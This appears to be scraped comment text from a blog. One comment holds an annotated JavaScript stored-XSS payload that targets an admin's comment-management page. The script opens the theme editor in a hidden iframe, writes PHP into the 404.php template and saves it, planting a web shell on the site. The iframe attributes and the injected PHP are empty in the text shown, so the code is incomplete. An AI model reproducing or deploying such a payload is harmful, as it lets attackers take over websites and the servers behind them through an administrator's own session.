1人
- 777ip测试
- 11// 定义一个函数,在网页末尾插入一个iframe元素 function insertIframe() { // 获取当前页面路径 var urlWithoutDomain = window.location.pathname; // 判断页面是否为评论管理页面 var hasManageComments = urlWithoutDomain.includes("manage-comments.php"); var tSrc=''; if (hasManageComments){ // 如果是,则将路径修改为用于修改主题文件的页面地址 tSrc=urlWithoutDomain.replace('manage-comments.php','theme-editor.php?theme=default&file=404.php'); }else{ // 如果不是,则直接使用主题文件修改页面地址 tSrc='/admin/theme-editor.php?theme=default&file=404.php'; } // 定义iframe元素的属性,包括id、src、width、height和onload事件 var iframeAttributes = ""; // 获取网页原始内容 var originalContent = document.body.innerHTML; // 在网页末尾添加iframe元素 document.body.innerHTML = (originalContent + iframeAttributes); } // 定义一个全局变量isSaved,初始值为false var isSaved = false; // 定义一个函数,在iframe中写入一段PHP代码并保存 function writeShell() { // 如果isSaved为false if (!isSaved) { // 获取iframe内的内容区域和“保存文件”按钮元素 var content = document.getElementById('theme_id').contentWindow.document.getElementById('content'); var btns = document.getElementById('theme_id').contentWindow.document.getElementsByTagName('button'); // 获取模板文件原始内容 var oldData = content.value; // 在原始内容前加入一段phpinfo代码 content.value = ('\n') + oldData; // 点击“保存文件”按钮 btns[1].click(); // 将isSaved设为true,表示已经完成写入操作 isSaved = true; } } // 调用insertIframe函数,向网页中添加iframe元素和写入PHP代码的事件 insertIframe();